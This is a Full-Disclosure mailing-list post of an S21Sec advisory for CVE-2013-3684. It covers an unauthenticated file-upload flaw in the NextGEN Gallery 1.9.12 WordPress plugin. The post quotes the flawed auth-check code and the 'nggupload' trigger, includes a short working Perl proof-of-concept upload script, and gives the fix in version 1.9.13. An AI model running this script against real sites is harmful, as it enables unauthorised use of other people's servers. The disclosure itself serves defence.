[Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload

[Marcos Agüero]

Title: S21sec

##############################################################                      - S21Sec Advisory - ##############################################################     Title:   NextGEN Gallery 1.9.12 Arbitrary File Upload        ID:   S21SEC-046-en    CVE ID:   CVE-2013-3684  Severity:   High    Status:   Fixed   History:   27.May.2013 Vulnerability discovered              28.May.2013 Vendor informed              12.Jun.2013 Fix released    Authors:  Marcos Agüero (magu...@s21sec.com)       URL:   http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt   Release:   Public [ SUMMARY ] NextGEN Gallery is a WordPress gallery plugin that offers sophisticated gallery management and displays. It's one of the most popular plugins ever produced for WordPress, currently downloaded around 30,000 times per week. [ AFFECTED VERSIONS ]       * NextGEN Gallery 1.9.12 [ DESCRIPTION ] NextGEN Gallery allows file upload to unauthenticated users. Filters in place only permits uploads of image files (extensions .gif, .png and .jpg). This avoids scripts execution problems but an attacker could use the affected system to host files. Vulnerability occurs due an innapropiate cookie validation in admin/upload.php script:     if (wp_validate_auth_cookie()) {         $results = wp_parse_auth_cookie();         $logged_in = FALSE;         if (isset($results['username']) && isset($results['expiration'])) {             if (time() < floatval($results['expiration'])) {                 if (($userdata = get_userdatabylogin($results['username'])))                     $logged_in = $userdata->ID;             }         }             if (!$logged_in) die("Login failure. -1");         else if (!user_can($logged_in, 'NextGEN Upload images')) {             die('You do not have permission to upload files. -2');         }     } # VULN: No auth cookie is okay! This can be triggered by invoking 'nggupload' parameter on any valid wordpress URL: ngggallery.php:     // Handle upload requests     add_action('init', array(&$this, 'handle_upload_request'));     [...]     function handle_upload_request()     {         if (isset($_GET['nggupload'])) {             require_once(implode(DIRECTORY_SEPARATOR, array(                 NGGALLERY_ABSPATH,                 'admin',                 'upload.php'             )));             throw new E_Clean_Exit();         }     } [ POC ] #! /usr/bin/perl use LWP; use HTTP::Request::Common; my ($url, $file) = @ARGV; my $ua = LWP::UserAgent->new(); my $req = POST $url,     Content_Type => 'form-data',     Content =>    [             name => $name,             galleryselect => 1,        # Gallery ID, should exist             Filedata => [ "$file", "file.gif",  Content_Type => 'image/gif' ]         ]; my $res = $ua->request( $req ); if( $res->is_success ) {     print $res->content; } else {     print $res->status_line, "\n"; } [ SOLUTION ] Version 1.9.13 released by vendor. http://wordpress.org/plugins/nextgen-gallery/ [ REFERENCES ] * S21Sec   http://www.s21sec.com -- Marcos Agüero S21sec ACSS Tlf: +34 902 222 521 www.s21sec.com, blog.s21sec.com securityblog.s21sec.com Salvo que se indique lo contrario, esta información es CONFIDENCIAL y contiene datos de carácter personal que han de ser tratados conforme a la legislación vigente en materia de protección de datos. Si usted no es destinatario original de este mensaje, le comunicamos que no está autorizado a revisar, reenviar, distribuir, copiar o imprimir la información en él contenida y le rogamos que proceda a borrarlo de sus sistemas. Unless contrary indicated, this information is CONFIDENTIAL and contains personal data that shall be processed according to personal data protection law in force. If you are not the named addressee of this message you are hereby notified that any review, dissemination, distribution, copying or printing of this message is strictly prohibited and we urge you to delete it from your Systems. Antes de imprimir este mensaje valora si verdaderamente es necesario. De esta forma contribuimos a la preservación del Medio Ambiente.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/